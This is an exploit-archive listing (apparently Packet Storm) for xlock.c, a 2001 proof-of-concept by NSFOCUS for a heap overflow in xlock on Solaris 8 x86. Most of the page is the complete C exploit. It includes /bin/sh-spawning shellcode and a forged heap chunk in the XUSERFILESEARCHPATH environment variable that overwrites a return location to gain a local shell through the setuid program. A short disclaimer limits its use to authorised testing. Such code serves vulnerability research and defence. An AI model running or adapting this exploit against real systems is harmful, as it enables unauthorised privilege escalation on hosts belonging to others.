what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

xlock.c

xlock.c
Posted Aug 20, 2001
Site nsfocus.com

xlock.c - Proof of Concept Code for xlock heap overflow bug. Tested in Solaris 8 x86.

tags | exploit, overflow, x86, proof of concept
systems | solaris
SHA-256 | 1c930575e877d31d683dec53347c6292c4dd407d310ecdc95493fb79f97dbc03

xlock.c

Change Mirror Download
/*
* xlock.c - Proof of Concept Code for xlock heap overflow bug.
* Copyright (c) 2001 - Nsfocus.com
*
* Tested in Solaris 8 x86.
*
* DISCLAIMS:
* This is a proof of concept code. This code is for test purpose
* only and should not be run against any host without permission from
* the system administrator.
*
* NSFOCUS Security Team <security@nsfocus.com>
* http://www.nsfocus.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/types.h>

#define RETLOC 0x080463c8 /* default retrun address location (Solaris 8 x86) */
#define SP 0x08047ffc /* default "bottom" stack address (Solaris 8 x86) */

#define VULPROG "/usr/openwin/bin/xlock"

char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x28\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x83\xec\x64\x33\xd2\xc6\x45\xce\x9a\x89"
"\x55\xcf\x89\x55\xd3\xc6\x45\xd3\x07\xc6\x45\xd5"
"\xc3\x89\x55\xfc\x83\xed\x32\x33\xc0\x50\x50\xb0"
"\xca\xff\xd5\x83\xc4\x08\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89"
"\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

int
main(int argc, char **argv)
{
char buf[2048], fake_chunk[48];
long retaddr, sp_addr = SP;
char *arg[24], *env[24];
long retloc = RETLOC;
unsigned int *ptr;
char ev1[]="XUSERFILESEARCHPATH=";
long ev1_len;
long overbuflen = 1024;

if (argc > 1) /* adjust retloc */
retloc += atoi(argv[1]);

bzero(buf, sizeof(buf));
ev1_len = strlen(ev1);
memcpy(buf, ev1, ev1_len);
memset(buf + ev1_len, 'A', overbuflen + sizeof(fake_chunk));

arg[0] = VULPROG;
arg[1] = NULL;

env[0] = shellcode; /* put shellcode in env */
env[1] = buf; /* put overflow environ */
env[2] = NULL; /* end of env */

/* get the not exact shellcode address :) */
retaddr = sp_addr - strlen(VULPROG) - 1
- strlen("i86pc") - 1
- strlen(buf) - 1
- strlen(shellcode) - 1;

printf("Using RET address = 0x%lx\n", retaddr);
printf("Using retloc = 0x%lx \n", retloc);

ptr = (unsigned int *) fake_chunk;
memset(fake_chunk, '\xff', sizeof(fake_chunk));
*(ptr + 0) = 0xfffffff9;
*(ptr + 2) = retaddr;
*(ptr + 8) = retloc - 8;

memcpy(buf + ev1_len + overbuflen, fake_chunk, sizeof(fake_chunk));

execve(VULPROG, arg, env);
perror("execle");
return(1);
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close